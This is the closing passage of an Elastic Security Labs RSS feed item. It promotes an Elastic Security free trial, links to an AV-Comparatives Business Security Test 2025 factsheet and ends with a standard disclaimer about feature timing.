<h2>Get started with Elastic Security</h2>
<p>Join the growing number of businesses that trust Elastic Security to protect their organization against attacks. Experience the peace of mind that comes with knowing your endpoints — and organization as a whole — are secure against the latest threats. Start your Elastic Security <a href="https://cloud.elastic.co/registration">free trial</a> and discover the difference that our protection can make. Visit <a href="https://www.elastic.co/security">elastic.co/security</a> to learn more and get started.</p>
<p>For more detailed results and to see the full report, visit the <a href="https://www.av-comparatives.org/tests/business-security-test-march-april-2025-factsheet/">AV-Comparatives Business Security Test 2025 website</a>.</p>
<p><em>The release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.</em></p>]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/security-labs/assets/images/elastic-security-av-comparatives-business-security-test-2025/image3.jpg" length="0" type="image/jpg"/>
        </item>
    </channel>
</rss>